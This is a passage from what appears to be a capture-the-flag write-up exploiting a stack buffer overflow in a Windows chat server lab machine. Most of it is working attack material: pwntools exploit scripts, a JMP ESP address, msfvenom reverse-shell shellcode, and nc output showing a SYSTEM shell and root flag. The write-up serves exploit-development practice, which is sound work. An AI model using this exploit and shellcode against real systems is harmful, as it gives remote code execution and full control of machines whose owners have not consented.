q3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk"
r = remote(HOST,PORT)
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print("[+] SENDING USERNAME")
r.send(str(payload)+"\r\n")
r.clean()
print("[+] SENDING CHAT")
r.send("Ok\r\n")
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
if (r.recvline(timeout=4))==b'':
print("[!] KO CHAT")
r.close()
r.clean()
r.close()
The server crashes like expected with the EIP value 46307746. At this time I discovered that I did not need to create this script because I could send the pattern with nc but this is what I did.
Anyway recovering the exact offset with msf-pattern_offset points that the exact match is 4560 chars:
msf-pattern_offset -l 5000 -q 46307746
[*] Exact match at offset 4560
The script evolved taking in consideration that the offset will be covered with 4560 chars + “BBBB” (42424242 in Ascii)
#!/bin/python3
from pwn import *
HOST = "10.10π"
PORT = "9999"
LIMIT = 60
offset = 4560
fuzz = "A"*offset
r = remote(HOST,PORT)
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print("[+] SENDING USERNAME")
r.send(str(fuzz)+"BBBB"+"\r\n")
r.clean()
print("[+] SENDING CHAT")
r.send("Ok\r\n")
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
if (r.recvline(timeout=4))==b'':
print("[!] KO CHAT")
r.close()
r.clean()
r.close()
The EIP is overwritten with 42424242 so I am on the track.
Now I want a JMP ESP instruction:
/usr/bin/msf-nasm_shell
nasm > jmp esp
00000000 FFE4 jmp esp
Using mona inside Inmunity debugger to find a memory addres with the JMP instruction:
Mona working directory, will be C:\Users\admin\Desktop\chatserver in my case:
!mona config -set workingfolder C:\Users\admin\Desktop\%p
!mona modules
!mona find -s "\xff\xe4"
Inside the generated file find (C:\Users\admin\Desktop\chatserver) You can find memory addresses without protection like 0x62501533
0x625014df : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x625014eb : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x625014f7 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x62501503 : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x6250150f : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x6250151b : "\xff\xe4" | asciiprint,ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x62501527 : "\xff\xe4" | asciiprint,ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x62501533 : "\xff\xe4" | asciiprint,ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
parsing the address to little endian:
62501533 -> “\x33\x15\x50\x62”
The next step is finding the badchars. For this task I used mona to generate the badchars and also modified my script:
!mona bytearray -cpb \x00
#!/bin/python3
from pwn import *
HOST = "10.10π"
PORT = "9999"
LIMIT = 60
offset = 4560
fuzz = "A"*offset
badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
r = remote(HOST,PORT)
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print("[+] SENDING USERNAME")
r.send(str(fuzz)+"BBBB"+str(badchars)+"\r\n")
r.clean()
print("[+] SENDING CHAT")
r.send("Ok\r\n")
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
if (r.recvline(timeout=4))==b'':
print("[!] KO CHAT")
r.close()
r.clean()
r.close()
To compare the badchars with mona:
!mona compare -a 017DEEC0 -f C:\Users\admin\Desktop\chatserver\bytearray.bin
Worked on the first try! So the final badchar is only the /x00
Shellcode generated with msfvenom:
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10π LPORT=4433 -f c -v shellcode -b '\x00' EXITFUNC=thread
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes
unsigned char shellcode[] =
"\xda\xce\xd9\x74\x24\xf4\xba\x30\x2e\x3b\xeb\x5b\x33\xc9\xb1"
"\x52\x31\x53\x17\x03\x53\x17\x83\xdb\xd2\xd9\x1e\xe7\xc3\x9c"
"\xe1\x17\x14\xc1\x68\xf2\x25\xc1\x0f\x77\x15\xf1\x44\xd5\x9a"
"\x7a\x08\xcd\x29\x0e\x85\xe2\x9a\xa5\xf3\xcd\x1b\x95\xc0\x4c"
"\x98\xe4\x14\xae\xa1\x26\x69\xaf\xe6\x5b\x80\xfd\xbf\x10\x37"
"\x11\xcb\x6d\x84\x9a\x87\x60\x8c\x7f\x5f\x82\xbd\x2e\xeb\xdd"
"\x1d\xd1\x38\x56\x14\xc9\x5d\x53\xee\x62\x95\x2f\xf1\xa2\xe7"
"\xd0\x5e\x8b\xc7\x22\x9e\xcc\xe0\xdc\xd5\x24\x13\x60\xee\xf3"
"\x69\xbe\x7b\xe7\xca\x35\xdb\xc3\xeb\x9a\xba\x80\xe0\x57\xc8"
"\xce\xe4\x66\x1d\x65\x10\xe2\xa0\xa9\x90\xb0\x86\x6d\xf8\x63"
"\xa6\x34\xa4\xc2\xd7\x26\x07\xba\x7d\x2d\xaa\xaf\x0f\x6c\xa3"
"\x1c\x22\x8e\x33\x0b\x35\xfd\x01\x94\xed\x69\x2a\x5d\x28\x6e"
"\x4d\x74\x8c\xe0\xb0\x77\xed\x29\x77\x23\xbd\x41\x5e\x4c\x56"
"\x91\x5f\x99\xf9\xc1\xcf\x72\xba\xb1\xaf\x22\x52\xdb\x3f\x1c"
"\x42\xe4\x95\x35\xe9\x1f\x7e\x30\xe7\x1b\x0a\x2c\xf5\x23\xe3"
"\xfd\x70\xc5\x69\xee\xd4\x5e\x06\x97\x7c\x14\xb7\x58\xab\x51"
"\xf7\xd3\x58\xa6\xb6\x13\x14\xb4\x2f\xd4\x63\xe6\xe6\xeb\x59"
"\x8e\x65\x79\x06\x4e\xe3\x62\x91\x19\xa4\x55\xe8\xcf\x58\xcf"
"\x42\xed\xa0\x89\xad\xb5\x7e\x6a\x33\x34\xf2\xd6\x17\x26\xca"
"\xd7\x13\x12\x82\x81\xcd\xcc\x64\x78\xbc\xa6\x3e\xd7\x16\x2e"
"\xc6\x1b\xa9\x28\xc7\x71\x5f\xd4\x76\x2c\x26\xeb\xb7\xb8\xae"
"\x94\xa5\x58\x50\x4f\x6e\x78\xb3\x45\x9b\x11\x6a\x0c\x26\x7c"
"\x8d\xfb\x65\x79\x0e\x09\x16\x7e\x0e\x78\x13\x3a\x88\x91\x69"
"\x53\x7d\x95\xde\x54\x54";
The final script:
#!/bin/python3
from pwn import *
HOST = "10.10π"
PORT = "9999"
offset = 4560
fuzz = "A"*offset
shellcode = ("\xda\xce\xd9\x74\x24\xf4\xba\x30\x2e\x3b\xeb\x5b\x33\xc9\xb1"
"\x52\x31\x53\x17\x03\x53\x17\x83\xdb\xd2\xd9\x1e\xe7\xc3\x9c"
"\xe1\x17\x14\xc1\x68\xf2\x25\xc1\x0f\x77\x15\xf1\x44\xd5\x9a"
"\x7a\x08\xcd\x29\x0e\x85\xe2\x9a\xa5\xf3\xcd\x1b\x95\xc0\x4c"
"\x98\xe4\x14\xae\xa1\x26\x69\xaf\xe6\x5b\x80\xfd\xbf\x10\x37"
"\x11\xcb\x6d\x84\x9a\x87\x60\x8c\x7f\x5f\x82\xbd\x2e\xeb\xdd"
"\x1d\xd1\x38\x56\x14\xc9\x5d\x53\xee\x62\x95\x2f\xf1\xa2\xe7"
"\xd0\x5e\x8b\xc7\x22\x9e\xcc\xe0\xdc\xd5\x24\x13\x60\xee\xf3"
"\x69\xbe\x7b\xe7\xca\x35\xdb\xc3\xeb\x9a\xba\x80\xe0\x57\xc8"
"\xce\xe4\x66\x1d\x65\x10\xe2\xa0\xa9\x90\xb0\x86\x6d\xf8\x63"
"\xa6\x34\xa4\xc2\xd7\x26\x07\xba\x7d\x2d\xaa\xaf\x0f\x6c\xa3"
"\x1c\x22\x8e\x33\x0b\x35\xfd\x01\x94\xed\x69\x2a\x5d\x28\x6e"
"\x4d\x74\x8c\xe0\xb0\x77\xed\x29\x77\x23\xbd\x41\x5e\x4c\x56"
"\x91\x5f\x99\xf9\xc1\xcf\x72\xba\xb1\xaf\x22\x52\xdb\x3f\x1c"
"\x42\xe4\x95\x35\xe9\x1f\x7e\x30\xe7\x1b\x0a\x2c\xf5\x23\xe3"
"\xfd\x70\xc5\x69\xee\xd4\x5e\x06\x97\x7c\x14\xb7\x58\xab\x51"
"\xf7\xd3\x58\xa6\xb6\x13\x14\xb4\x2f\xd4\x63\xe6\xe6\xeb\x59"
"\x8e\x65\x79\x06\x4e\xe3\x62\x91\x19\xa4\x55\xe8\xcf\x58\xcf"
"\x42\xed\xa0\x89\xad\xb5\x7e\x6a\x33\x34\xf2\xd6\x17\x26\xca"
"\xd7\x13\x12\x82\x81\xcd\xcc\x64\x78\xbc\xa6\x3e\xd7\x16\x2e"
"\xc6\x1b\xa9\x28\xc7\x71\x5f\xd4\x76\x2c\x26\xeb\xb7\xb8\xae"
"\x94\xa5\x58\x50\x4f\x6e\x78\xb3\x45\x9b\x11\x6a\x0c\x26\x7c"
"\x8d\xfb\x65\x79\x0e\x09\x16\x7e\x0e\x78\x13\x3a\x88\x91\x69"
"\x53\x7d\x95\xde\x54\x54")
esp = "\x33\x15\x50\x62"
nop = "\x90"*20
r = remote(HOST,PORT)
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print("[+] SENDING USERNAME")
r.send("A"*offset+esp+nop+str(shellcode)+"\r\n")
r.clean()
print("[+] SENDING CHAT")
r.send("Ok\r\n")
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
if (r.recvline(timeout=4))==b'':
print("[!] KO CHAT")
r.close()
r.clean()
r.close()
Listening on my machine with nc:
nc -lvp 4433
listening on [any] 4433 ...
10.10π: inverse host lookup failed: Unknown host
connect to [10.10π] from (UNKNOWN) [10.10π] 49299
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\admin\Desktop\vulnerable-apps\chatserver>
Worked !
So now my custom script can be fired agaisnt the real machine.
Just change the IP to the real one. Worked flawless on the first try π
nc -lvp 4433
listening on [any] 4433 ...
10.10π: inverse host lookup failed: Unknown host
connect to [10.10π] from (UNKNOWN) [10.10π] 49467
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
The service was running as nt authority\system so the machine is rooted.
Finally the root flag is under the following path:
C:\Users\drake\Desktop>type root.txt
type root.txt
5b10π
I enjoyed the machine because all went as expected without issues, the only badchar /x00 was refreshing because I expected a lot of debugging on the badchar process. Not bad at all. The machine description suggests that you have to do reverse engineering the .exe file probably you can use another approach like using Ghidra, radare2 or another reverse tool but my goal was to practice the bufferoverflow attacks with mona and the exploit development with python and pwn tools.
I was happy at the end, also more funnier than exploit the same .exe file with different badchars/offset like the previous posts. Good stuff.
Thanks for reading!